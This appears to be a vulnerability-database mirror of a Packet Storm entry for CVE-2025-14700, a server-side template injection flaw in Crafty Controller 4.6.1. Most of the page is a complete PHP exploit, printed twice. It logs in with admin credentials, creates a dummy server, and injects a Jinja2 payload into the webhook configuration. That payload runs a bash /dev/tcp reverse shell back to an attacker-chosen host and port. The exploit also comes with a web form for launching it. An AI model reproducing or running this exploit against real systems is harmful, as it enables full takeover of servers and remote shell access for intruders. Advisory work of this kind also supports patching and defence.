📄 Crafty Controller 4.6.1 Remote Code Execution / Server-Side Template...

9.9 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Description

Crafty Controller version 4.6.1 allows authenticated remote attackers to execute arbitrary system commands on the target server through server-side template injection the webhook configuration feature...

Visit Original Source

Basic Information

ID PACKETSTORM:213258

Published Dec 23, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Crafty Controller 4.6.1 authenticated RCE via Server-Side Template Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://craftycontrol.com/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/213042/ & CVE-2025-14700

[+] Summary : This PHP script is a complete port of a Python exploit targeting CVE-2025-14700, a critical vulnerability in the Crafty Controller Minecraft server management platform.
The exploit chain allows authenticated remote attackers to execute arbitrary system commands on the target server through Server-Side Template Injection (SSTI) in the webhook configuration feature.

[+] Exploitation Chain:

1- Authentication Bypass & Token Harvesting

Retrieves initial XSRF token from login page

Authenticates with admin credentials to obtain JWT token

Maintains session cookies throughout the attack

2- Server Creation for Payload Delivery

Creates a dummy Minecraft server via API

Required to access the vulnerable webhook configuration endpoint

3- SSTI Payload Injection

Injects malicious Jinja2 template into Discord webhook configuration

Uses cycler.__init__.__globals__.os.system() to escape template sandbox

Embeds reverse shell command for remote access

4- Triggering the Vulnerability

Emulates browser requests to trigger server start action

Executes EULA confirmation to initialize the server

The template is rendered during server initialization, executing the payload

[+] Technical Details:

Vulnerable Component: Webhook configuration in /api/v2/servers/{id}/webhook

Attack Vector: Authenticated SSTI → RCE

Privileges Required: Admin credentials

Impact: Full system compromise via reverse shell

Default Port: 8443 (HTTPS)

[+] CODE : php exploit.php --url=https://target.com:8443 --login=admin --password=password --lhost=192.168.1.100 --lport=4444

<?php

error_reporting(E_ALL);
ini_set('display_errors', 1);

// Reverse Shell Template
define('REVSHELL_TEMPLATE', "bash -c 'bash -i >/dev/tcp/%s/%d 0<&1 2>&1'");

class CraftyExploit {
private $url;
private $login;
private $password;
private $lhost;
private $lport;
private $session;
private $cookies;

public function __construct($url, $login, $password, $lhost, $lport) {
$this->url = rtrim($url, '/');
$this->login = $login;
$this->password = $password;
$this->lhost = $lhost;
$this->lport = $lport;
$this->session = curl_init();
$this->cookies = [];

// Configure cURL options
curl_setopt($this->session, CURLOPT_RETURNTRANSFER, true);
curl_setopt($this->session, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($this->session, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($this->session, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($this->session, CURLOPT_HEADER, true);
curl_setopt($this->session, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
}

private function request($method, $endpoint, $data = null, $headers = [], $returnHeaders = false) {
$url = $this->url . $endpoint;

curl_setopt($this->session, CURLOPT_URL, $url);
curl_setopt($this->session, CURLOPT_CUSTOMREQUEST, $method);

// Set headers
$defaultHeaders = [
'Accept: application/json, text/plain, */*',
'Accept-Language: en-US,en;q=0.9',
'Connection: keep-alive',
];

$allHeaders = array_merge($defaultHeaders, $headers);
curl_setopt($this->session, CURLOPT_HTTPHEADER, $allHeaders);

// Set cookies if any
if (!empty($this->cookies)) {
$cookieStr = '';
foreach ($this->cookies as $name => $value) {
$cookieStr .= "$name=$value; ";
}
curl_setopt($this->session, CURLOPT_COOKIE, trim($cookieStr));
}

// Set POST data
if ($method === 'POST' && $data !== null) {
if (isset($headers['Content-Type']) && strpos($headers['Content-Type'], 'application/json') !== false) {
curl_setopt($this->session, CURLOPT_POSTFIELDS, json_encode($data));
} else {
curl_setopt($this->session, CURLOPT_POSTFIELDS, $data);
}
}

$response = curl_exec($this->session);

if ($response === false) {
echo "cURL Error: " . curl_error($this->session) . "\n";
return false;
}

// Parse response
$headerSize = curl_getinfo($this->session, CURLINFO_HEADER_SIZE);
$headers = substr($response, 0, $headerSize);
$body = substr($response, $headerSize);

// Update cookies from response
$this->parseCookies($headers);

// Create response object
$result = [
'status_code' => curl_getinfo($this->session, CURLINFO_HTTP_CODE),
'headers' => $headers,
'body' => $body,
'request_url' => $url,
'request_method' => $method
];

if ($returnHeaders) {
return $result;
}

return $body;
}

private function parseCookies($headers) {
$lines = explode("\n", $headers);
foreach ($lines as $line) {
if (stripos($line, 'Set-Cookie:') === 0) {
$cookie = trim(substr($line, 11));
$parts = explode(';', $cookie);
$cookiePair = explode('=', $parts[0], 2);
if (count($cookiePair) === 2) {
$this->cookies[$cookiePair[0]] = $cookiePair[1];
}
}
}
}

private function printDebugInfo($response) {
echo "\n" . str_repeat("=", 80) . "\n";
echo "[{$response['request_method']}] {$response['request_url']} -> HTTP {$response['status_code']}\n";
echo str_repeat("-", 20) . " [KEY HEADERS VALIDATION] " . str_repeat("-", 20) . "\n";

// Important headers to display
$importantHeaders = ['token', 'X-XSRFToken', 'Authorization', 'Cookie', 'Referer', 'Content-Type'];
$headers = $this->parseResponseHeaders($response['headers']);

foreach ($importantHeaders as $h) {
$hLower = strtolower($h);
foreach ($headers as $headerName => $headerValue) {
if (strtolower($headerName) === $hLower) {
echo "$h: $headerValue\n";
break;
}
}
}

echo str_repeat("-", 20) . " [RESPONSE BODY] " . str_repeat("-", 25) . "\n";

// Try to decode JSON
$json = json_decode($response['body'], true);
if (json_last_error() === JSON_ERROR_NONE) {
echo json_encode($json, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE) . "\n";
} else {
// Truncate output if it's not JSON
echo (strlen($response['body']) > 200) ? substr($response['body'], 0, 200) . "..." : $response['body'];
if (empty($response['body'])) {
echo "(Empty Body)";
}
echo "\n";
}

echo str_repeat("=", 80) . "\n\n";
}

private function parseResponseHeaders($headers) {
$parsed = [];
$lines = explode("\n", $headers);
foreach ($lines as $line) {
if (strpos($line, ':') !== false) {
list($name, $value) = explode(':', $line, 2);
$parsed[trim($name)] = trim($value);
}
}
return $parsed;
}

public function apiLogin() {
echo "[*] STEP 1: Visiting login page to retrieve initial _xsrf cookie...\n";

// Get initial XSRF token
$response = $this->request('GET', '/login', null, [], true);
$xsrf = $this->cookies['_xsrf'] ?? '';

echo "[*] STEP 2: Executing authentication (XSRF: " . substr($xsrf, 0, 15) . "...)\n";

$endpoint = '/api/v2/auth/login/';
$headers = [
'Content-Type: application/json',
'X-XSRFToken: ' . $xsrf,
'Referer: ' . $this->url . '/login?next=%2Fpanel%2Fdashboard',
'Origin: ' . $this->url
];

$data = [
'username' => $this->login,
'password' => $this->password
];

$response = $this->request('POST', $endpoint, $data, $headers, true);
$this->printDebugInfo($response);

$responseData = json_decode($response['body'], true);

if ($response['status_code'] == 200 &&
isset($responseData['status']) &&
$responseData['status'] == 'ok' &&
isset($responseData['data']['token'])) {
return $responseData['data']['token'];
}

die("[FATAL] Login failed. Please check credentials or target connectivity.\n");
}

public function createServer($jwtToken) {
echo "[*] STEP 3: Creating exploit dummy server...\n";

$endpoint = '/api/v2/servers';
$xsrf = $this->cookies['_xsrf'] ?? '';

$headers = [
'Content-Type: application/json',
'Authorization: Bearer ' . $jwtToken,
'X-XSRFToken: ' . $xsrf,
'Referer: ' . $this->url . '/panel/dashboard'
];

$data = [
'name' => 'CVE_2025_14700_Exploit_Automation',
'monitoring_type' => 'minecraft_java',
'minecraft_java_monitoring_data' => ['host' => '127.0.0.1', 'port' => 25565],
'create_type' => 'minecraft_java',
'minecraft_java_create_data' => [
'create_type' => 'download_jar',
'download_jar_create_data' => [
'category' => 'mc_java_servers',
'type' => 'paper',
'version' => '1.18.2',
'mem_min' => 1,
'mem_max' => 2,
'server_properties_port' => 25565
]
]
];

$response = $this->request('POST', $endpoint, $data, $headers, true);
$this->printDebugInfo($response);

$responseData = json_decode($response['body'], true);

if (isset($responseData['data']['new_server_id'])) {
return $responseData['data']['new_server_id'];
}

die("[FATAL] Failed to create server.\n");
}

public function createHook($serverId, $lhost, $lport, $jwtToken) {
echo "[*] STEP 4: Injecting SSTI Reverse Shell payload...\n";

$endpoint = "/api/v2/servers/{$serverId}/webhook";
$xsrf = $this->cookies['_xsrf'] ?? '';
$revshellCmd = sprintf(REVSHELL_TEMPLATE, $lhost, $lport);

// Jinja2 SSTI payload
$payload = '{{ self._TemplateReference__context.cycler.__init__.__globals__.os.system("' . $revshellCmd . '") }}';

$headers = [
'Content-Type: application/json',
'Authorization: Bearer ' . $jwtToken,
'X-XSRFToken: ' . $xsrf,
'Referer: ' . $this->url . '/panel/dashboard'
];

$data = [
'webhook_type' => 'Discord',
'name' => 'Exploit_Trigger_Hook',
'url' => 'https://localhost:8443/',
'bot_name' => 'Crafty Bot',
'trigger' => ['start_server'],
'body' => $payload,
'color' => '#c646000',
'enabled' => true
];

$response = $this->request('POST', $endpoint, $data, $headers, true);
$this->printDebugInfo($response);
}

public function triggerExploit($serverId, $jwtToken) {
echo "\n[*] STEP 5: Executing protocol-level trigger emulation (Critical Phase)...\n";

$xsrf = $this->cookies['_xsrf'] ?? '';
$host = parse_url($this->url, PHP_URL_HOST);

// Set JWT in cookies
$this->cookies['token'] = $jwtToken;

// 1. Trigger Start Server Action
$startUrl = "/api/v2/servers/{$serverId}/action/start_server";
echo "[*] Sending start_server action request...\n";

$headers = [
'token: ' . $xsrf,
'X-XSRFToken: ' . $xsrf,
'X-Requested-With: XMLHttpRequest',
'Origin: ' . $this->url,
'Referer: ' . $this->url . '/panel/dashboard',
'Accept: */*',
'Accept-Encoding: gzip, deflate, br',
'sec-ch-ua-platform: "Windows"'
];

$response = $this->request('POST', $startUrl, '', $headers, true);
$this->printDebugInfo($response);

sleep(2);

// 2. Trigger EULA Action
$eulaUrl = "/api/v2/servers/{$serverId}/action/eula";
echo "[*] Sending EULA confirmation action request...\n";

$this->request('POST', $eulaUrl, '', $headers, false);

echo "\n[+] POC Execution completed. Check your nc listener ({$this->lhost}:{$this->lport}).\n";
}

public function run() {
$jwt = $this->apiLogin();
$serverId = $this->createServer($jwt);
$this->createHook($serverId, $this->lhost, $this->lport, $jwt);
$this->triggerExploit($serverId, $jwt);
}

public function __destruct() {
if (is_resource($this->session)) {
curl_close($this->session);
}
}
}

// Command line interface
if (PHP_SAPI === 'cli') {
$options = getopt('u:l:p:lh:lp:', [
'url:', 'login:', 'password:', 'lhost:', 'lport:'
]);

$url = $options['u'] ?? $options['url'] ?? null;
$login = $options['l'] ?? $options['login'] ?? null;
$password = $options['p'] ?? $options['password'] ?? null;
$lhost = $options['lh'] ?? $options['lhost'] ?? null;
$lport = $options['lp'] ?? $options['lport'] ?? null;

if (!$url || !$login || !$password || !$lhost || !$lport) {
echo "Usage: php " . basename(__FILE__) . " [options]\n";
echo "Options:\n";
echo " -u, --url Target base URL (e.g., https://10.67.3.77:8443)\n";
echo " -l, --login Admin username\n";
echo " -p, --password Admin password\n";
echo " -lh, --lhost Local listener IP\n";
echo " -lp, --lport Local listener port\n";
exit(1);
}

$exploit = new CraftyExploit($url, $login, $password, $lhost, (int)$lport);
$exploit->run();
} else {
// Web interface (optional)
echo "<pre>";
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$url = $_POST['url'] ?? '';
$login = $_POST['login'] ?? '';
$password = $_POST['password'] ?? '';
$lhost = $_POST['lhost'] ?? '';
$lport = $_POST['lport'] ?? '';

if ($url && $login && $password && $lhost && $lport) {
$exploit = new CraftyExploit($url, $login, $password, $lhost, (int)$lport);
$exploit->run();
} else {
echo "Please fill all fields.\n";
}
}
echo "</pre>";
?>
<!DOCTYPE html>
<html>
<head>
<title>CVE-2025-14700 Exploit</title>
</head>
<body>
<h2>CVE-2025-14700 Exploit Interface</h2>
<form method="POST">
URL: <input type="text" name="url" size="50" placeholder="https://10.67.3.77:8443"><br><br>
Login: <input type="text" name="login"><br><br>
Password: <input type="password" name="password"><br><br>
LHOST: <input type="text" name="lhost" placeholder="192.168.1.100"><br><br>
LPORT: <input type="text" name="lport" placeholder="4444"><br><br>
<input type="submit" value="Execute">
</form>
</body>
</html>
<?php
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-23T17:16:15",
    "description": "Crafty Controller version 4.6.1 allows authenticated remote attackers to execute arbitrary system commands on the target server through server-side template injection the webhook configuration feature...",
    "published": "2025-12-23T00:00:00",
    "modified": "2025-12-23T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Crafty Controller 4.6.1 Remote Code Execution / Server-Side Template Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:213258",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-14700"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Crafty Controller 4.6.1 authenticated RCE via Server-Side Template Injection                                                |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : https://craftycontrol.com/                                                                                                  |\n    =============================================================================================================================================\n    \n    [+] References :  https://packetstorm.news/files/id/213042/ & \tCVE-2025-14700\n    \n    [+] Summary    : This PHP script is a complete port of a Python exploit targeting CVE-2025-14700, a critical vulnerability in the Crafty Controller Minecraft server management platform. \n                     The exploit chain allows authenticated remote attackers to execute arbitrary system commands on the target server through Server-Side Template Injection (SSTI) in the webhook configuration feature.\n    \n    [+] Exploitation Chain:\n    \n    1- Authentication Bypass & Token Harvesting\n    \n    Retrieves initial XSRF token from login page\n    \n    Authenticates with admin credentials to obtain JWT token\n    \n    Maintains session cookies throughout the attack\n    \n    2- Server Creation for Payload Delivery\n    \n    Creates a dummy Minecraft server via API\n    \n    Required to access the vulnerable webhook configuration endpoint\n    \n    3- SSTI Payload Injection\n    \n    Injects malicious Jinja2 template into Discord webhook configuration\n    \n    Uses cycler.__init__.__globals__.os.system() to escape template sandbox\n    \n    Embeds reverse shell command for remote access\n    \n    4- Triggering the Vulnerability\n    \n    Emulates browser requests to trigger server start action\n    \n    Executes EULA confirmation to initialize the server\n    \n    The template is rendered during server initialization, executing the payload\n    \n    [+] Technical Details:\n    \n    Vulnerable Component: Webhook configuration in /api/v2/servers/{id}/webhook\n    \n    Attack Vector: Authenticated SSTI \u2192 RCE\n    \n    Privileges Required: Admin credentials\n    \n    Impact: Full system compromise via reverse shell\n    \n    Default Port: 8443 (HTTPS)\n    \n    \n    [+]  CODE : php exploit.php --url=https://target.com:8443 --login=admin --password=password --lhost=192.168.1.100 --lport=4444\n    \n    <?php\n    \n    \n    error_reporting(E_ALL);\n    ini_set('display_errors', 1);\n    \n    // Reverse Shell Template\n    define('REVSHELL_TEMPLATE', \"bash -c 'bash -i >/dev/tcp/%s/%d 0<&1 2>&1'\");\n    \n    class CraftyExploit {\n        private $url;\n        private $login;\n        private $password;\n        private $lhost;\n        private $lport;\n        private $session;\n        private $cookies;\n        \n        public function __construct($url, $login, $password, $lhost, $lport) {\n            $this->url = rtrim($url, '/');\n            $this->login = $login;\n            $this->password = $password;\n            $this->lhost = $lhost;\n            $this->lport = $lport;\n            $this->session = curl_init();\n            $this->cookies = [];\n            \n            // Configure cURL options\n            curl_setopt($this->session, CURLOPT_RETURNTRANSFER, true);\n            curl_setopt($this->session, CURLOPT_SSL_VERIFYPEER, false);\n            curl_setopt($this->session, CURLOPT_SSL_VERIFYHOST, false);\n            curl_setopt($this->session, CURLOPT_FOLLOWLOCATION, true);\n            curl_setopt($this->session, CURLOPT_HEADER, true);\n            curl_setopt($this->session, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');\n        }\n        \n        private function request($method, $endpoint, $data = null, $headers = [], $returnHeaders = false) {\n            $url = $this->url . $endpoint;\n            \n            curl_setopt($this->session, CURLOPT_URL, $url);\n            curl_setopt($this->session, CURLOPT_CUSTOMREQUEST, $method);\n            \n            // Set headers\n            $defaultHeaders = [\n                'Accept: application/json, text/plain, */*',\n                'Accept-Language: en-US,en;q=0.9',\n                'Connection: keep-alive',\n            ];\n            \n            $allHeaders = array_merge($defaultHeaders, $headers);\n            curl_setopt($this->session, CURLOPT_HTTPHEADER, $allHeaders);\n            \n            // Set cookies if any\n            if (!empty($this->cookies)) {\n                $cookieStr = '';\n                foreach ($this->cookies as $name => $value) {\n                    $cookieStr .= \"$name=$value; \";\n                }\n                curl_setopt($this->session, CURLOPT_COOKIE, trim($cookieStr));\n            }\n            \n            // Set POST data\n            if ($method === 'POST' && $data !== null) {\n                if (isset($headers['Content-Type']) && strpos($headers['Content-Type'], 'application/json') !== false) {\n                    curl_setopt($this->session, CURLOPT_POSTFIELDS, json_encode($data));\n                } else {\n                    curl_setopt($this->session, CURLOPT_POSTFIELDS, $data);\n                }\n            }\n            \n            $response = curl_exec($this->session);\n            \n            if ($response === false) {\n                echo \"cURL Error: \" . curl_error($this->session) . \"\\n\";\n                return false;\n            }\n            \n            // Parse response\n            $headerSize = curl_getinfo($this->session, CURLINFO_HEADER_SIZE);\n            $headers = substr($response, 0, $headerSize);\n            $body = substr($response, $headerSize);\n            \n            // Update cookies from response\n            $this->parseCookies($headers);\n            \n            // Create response object\n            $result = [\n                'status_code' => curl_getinfo($this->session, CURLINFO_HTTP_CODE),\n                'headers' => $headers,\n                'body' => $body,\n                'request_url' => $url,\n                'request_method' => $method\n            ];\n            \n            if ($returnHeaders) {\n                return $result;\n            }\n            \n            return $body;\n        }\n        \n        private function parseCookies($headers) {\n            $lines = explode(\"\\n\", $headers);\n            foreach ($lines as $line) {\n                if (stripos($line, 'Set-Cookie:') === 0) {\n                    $cookie = trim(substr($line, 11));\n                    $parts = explode(';', $cookie);\n                    $cookiePair = explode('=', $parts[0], 2);\n                    if (count($cookiePair) === 2) {\n                        $this->cookies[$cookiePair[0]] = $cookiePair[1];\n                    }\n                }\n            }\n        }\n        \n        private function printDebugInfo($response) {\n            echo \"\\n\" . str_repeat(\"=\", 80) . \"\\n\";\n            echo \"[{$response['request_method']}] {$response['request_url']} -> HTTP {$response['status_code']}\\n\";\n            echo str_repeat(\"-\", 20) . \" [KEY HEADERS VALIDATION] \" . str_repeat(\"-\", 20) . \"\\n\";\n            \n            // Important headers to display\n            $importantHeaders = ['token', 'X-XSRFToken', 'Authorization', 'Cookie', 'Referer', 'Content-Type'];\n            $headers = $this->parseResponseHeaders($response['headers']);\n            \n            foreach ($importantHeaders as $h) {\n                $hLower = strtolower($h);\n                foreach ($headers as $headerName => $headerValue) {\n                    if (strtolower($headerName) === $hLower) {\n                        echo \"$h: $headerValue\\n\";\n                        break;\n                    }\n                }\n            }\n            \n            echo str_repeat(\"-\", 20) . \" [RESPONSE BODY] \" . str_repeat(\"-\", 25) . \"\\n\";\n            \n            // Try to decode JSON\n            $json = json_decode($response['body'], true);\n            if (json_last_error() === JSON_ERROR_NONE) {\n                echo json_encode($json, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE) . \"\\n\";\n            } else {\n                // Truncate output if it's not JSON\n                echo (strlen($response['body']) > 200) ? substr($response['body'], 0, 200) . \"...\" : $response['body'];\n                if (empty($response['body'])) {\n                    echo \"(Empty Body)\";\n                }\n                echo \"\\n\";\n            }\n            \n            echo str_repeat(\"=\", 80) . \"\\n\\n\";\n        }\n        \n        private function parseResponseHeaders($headers) {\n            $parsed = [];\n            $lines = explode(\"\\n\", $headers);\n            foreach ($lines as $line) {\n                if (strpos($line, ':') !== false) {\n                    list($name, $value) = explode(':', $line, 2);\n                    $parsed[trim($name)] = trim($value);\n                }\n            }\n            return $parsed;\n        }\n        \n        public function apiLogin() {\n            echo \"[*] STEP 1: Visiting login page to retrieve initial _xsrf cookie...\\n\";\n            \n            // Get initial XSRF token\n            $response = $this->request('GET', '/login', null, [], true);\n            $xsrf = $this->cookies['_xsrf'] ?? '';\n            \n            echo \"[*] STEP 2: Executing authentication (XSRF: \" . substr($xsrf, 0, 15) . \"...)\\n\";\n            \n            $endpoint = '/api/v2/auth/login/';\n            $headers = [\n                'Content-Type: application/json',\n                'X-XSRFToken: ' . $xsrf,\n                'Referer: ' . $this->url . '/login?next=%2Fpanel%2Fdashboard',\n                'Origin: ' . $this->url\n            ];\n            \n            $data = [\n                'username' => $this->login,\n                'password' => $this->password\n            ];\n            \n            $response = $this->request('POST', $endpoint, $data, $headers, true);\n            $this->printDebugInfo($response);\n            \n            $responseData = json_decode($response['body'], true);\n            \n            if ($response['status_code'] == 200 && \n                isset($responseData['status']) && \n                $responseData['status'] == 'ok' &&\n                isset($responseData['data']['token'])) {\n                return $responseData['data']['token'];\n            }\n            \n            die(\"[FATAL] Login failed. Please check credentials or target connectivity.\\n\");\n        }\n        \n        public function createServer($jwtToken) {\n            echo \"[*] STEP 3: Creating exploit dummy server...\\n\";\n            \n            $endpoint = '/api/v2/servers';\n            $xsrf = $this->cookies['_xsrf'] ?? '';\n            \n            $headers = [\n                'Content-Type: application/json',\n                'Authorization: Bearer ' . $jwtToken,\n                'X-XSRFToken: ' . $xsrf,\n                'Referer: ' . $this->url . '/panel/dashboard'\n            ];\n            \n            $data = [\n                'name' => 'CVE_2025_14700_Exploit_Automation',\n                'monitoring_type' => 'minecraft_java',\n                'minecraft_java_monitoring_data' => ['host' => '127.0.0.1', 'port' => 25565],\n                'create_type' => 'minecraft_java',\n                'minecraft_java_create_data' => [\n                    'create_type' => 'download_jar',\n                    'download_jar_create_data' => [\n                        'category' => 'mc_java_servers',\n                        'type' => 'paper',\n                        'version' => '1.18.2',\n                        'mem_min' => 1,\n                        'mem_max' => 2,\n                        'server_properties_port' => 25565\n                    ]\n                ]\n            ];\n            \n            $response = $this->request('POST', $endpoint, $data, $headers, true);\n            $this->printDebugInfo($response);\n            \n            $responseData = json_decode($response['body'], true);\n            \n            if (isset($responseData['data']['new_server_id'])) {\n                return $responseData['data']['new_server_id'];\n            }\n            \n            die(\"[FATAL] Failed to create server.\\n\");\n        }\n        \n        public function createHook($serverId, $lhost, $lport, $jwtToken) {\n            echo \"[*] STEP 4: Injecting SSTI Reverse Shell payload...\\n\";\n            \n            $endpoint = \"/api/v2/servers/{$serverId}/webhook\";\n            $xsrf = $this->cookies['_xsrf'] ?? '';\n            $revshellCmd = sprintf(REVSHELL_TEMPLATE, $lhost, $lport);\n            \n            // Jinja2 SSTI payload\n            $payload = '{{ self._TemplateReference__context.cycler.__init__.__globals__.os.system(\"' . $revshellCmd . '\") }}';\n            \n            $headers = [\n                'Content-Type: application/json',\n                'Authorization: Bearer ' . $jwtToken,\n                'X-XSRFToken: ' . $xsrf,\n                'Referer: ' . $this->url . '/panel/dashboard'\n            ];\n            \n            $data = [\n                'webhook_type' => 'Discord',\n                'name' => 'Exploit_Trigger_Hook',\n                'url' => 'https://localhost:8443/',\n                'bot_name' => 'Crafty Bot',\n                'trigger' => ['start_server'],\n                'body' => $payload,\n                'color' => '#c646000',\n                'enabled' => true\n            ];\n            \n            $response = $this->request('POST', $endpoint, $data, $headers, true);\n            $this->printDebugInfo($response);\n        }\n        \n        public function triggerExploit($serverId, $jwtToken) {\n            echo \"\\n[*] STEP 5: Executing protocol-level trigger emulation (Critical Phase)...\\n\";\n            \n            $xsrf = $this->cookies['_xsrf'] ?? '';\n            $host = parse_url($this->url, PHP_URL_HOST);\n            \n            // Set JWT in cookies\n            $this->cookies['token'] = $jwtToken;\n            \n            // 1. Trigger Start Server Action\n            $startUrl = \"/api/v2/servers/{$serverId}/action/start_server\";\n            echo \"[*] Sending start_server action request...\\n\";\n            \n            $headers = [\n                'token: ' . $xsrf,\n                'X-XSRFToken: ' . $xsrf,\n                'X-Requested-With: XMLHttpRequest',\n                'Origin: ' . $this->url,\n                'Referer: ' . $this->url . '/panel/dashboard',\n                'Accept: */*',\n                'Accept-Encoding: gzip, deflate, br',\n                'sec-ch-ua-platform: \"Windows\"'\n            ];\n            \n            $response = $this->request('POST', $startUrl, '', $headers, true);\n            $this->printDebugInfo($response);\n            \n            sleep(2);\n            \n            // 2. Trigger EULA Action\n            $eulaUrl = \"/api/v2/servers/{$serverId}/action/eula\";\n            echo \"[*] Sending EULA confirmation action request...\\n\";\n            \n            $this->request('POST', $eulaUrl, '', $headers, false);\n            \n            echo \"\\n[+] POC Execution completed. Check your nc listener ({$this->lhost}:{$this->lport}).\\n\";\n        }\n        \n        public function run() {\n            $jwt = $this->apiLogin();\n            $serverId = $this->createServer($jwt);\n            $this->createHook($serverId, $this->lhost, $this->lport, $jwt);\n            $this->triggerExploit($serverId, $jwt);\n        }\n        \n        public function __destruct() {\n            if (is_resource($this->session)) {\n                curl_close($this->session);\n            }\n        }\n    }\n    \n    // Command line interface\n    if (PHP_SAPI === 'cli') {\n        $options = getopt('u:l:p:lh:lp:', [\n            'url:', 'login:', 'password:', 'lhost:', 'lport:'\n        ]);\n        \n        $url = $options['u'] ?? $options['url'] ?? null;\n        $login = $options['l'] ?? $options['login'] ?? null;\n        $password = $options['p'] ?? $options['password'] ?? null;\n        $lhost = $options['lh'] ?? $options['lhost'] ?? null;\n        $lport = $options['lp'] ?? $options['lport'] ?? null;\n        \n        if (!$url || !$login || !$password || !$lhost || !$lport) {\n            echo \"Usage: php \" . basename(__FILE__) . \" [options]\\n\";\n            echo \"Options:\\n\";\n            echo \"  -u, --url        Target base URL (e.g., https://10.67.3.77:8443)\\n\";\n            echo \"  -l, --login      Admin username\\n\";\n            echo \"  -p, --password   Admin password\\n\";\n            echo \"  -lh, --lhost     Local listener IP\\n\";\n            echo \"  -lp, --lport     Local listener port\\n\";\n            exit(1);\n        }\n        \n        $exploit = new CraftyExploit($url, $login, $password, $lhost, (int)$lport);\n        $exploit->run();\n    } else {\n        // Web interface (optional)\n        echo \"<pre>\";\n        if ($_SERVER['REQUEST_METHOD'] === 'POST') {\n            $url = $_POST['url'] ?? '';\n            $login = $_POST['login'] ?? '';\n            $password = $_POST['password'] ?? '';\n            $lhost = $_POST['lhost'] ?? '';\n            $lport = $_POST['lport'] ?? '';\n            \n            if ($url && $login && $password && $lhost && $lport) {\n                $exploit = new CraftyExploit($url, $login, $password, $lhost, (int)$lport);\n                $exploit->run();\n            } else {\n                echo \"Please fill all fields.\\n\";\n            }\n        }\n        echo \"</pre>\";\n        ?>\n        <!DOCTYPE html>\n        <html>\n        <head>\n            <title>CVE-2025-14700 Exploit</title>\n        </head>\n        <body>\n            <h2>CVE-2025-14700 Exploit Interface</h2>\n            <form method=\"POST\">\n                URL: <input type=\"text\" name=\"url\" size=\"50\" placeholder=\"https://10.67.3.77:8443\"><br><br>\n                Login: <input type=\"text\" name=\"login\"><br><br>\n                Password: <input type=\"password\" name=\"password\"><br><br>\n                LHOST: <input type=\"text\" name=\"lhost\" placeholder=\"192.168.1.100\"><br><br>\n                LPORT: <input type=\"text\" name=\"lport\" placeholder=\"4444\"><br><br>\n                <input type=\"submit\" value=\"Execute\">\n            </form>\n        </body>\n        </html>\n        <?php\n    }\n    ?>\n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/213258",
    "cvss": {
        "score": 9.9,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/213258/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Crafty Controller 4.6.1 Remote Code Execution / Server-Side Template Injection_PACKETSTORM:213258

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply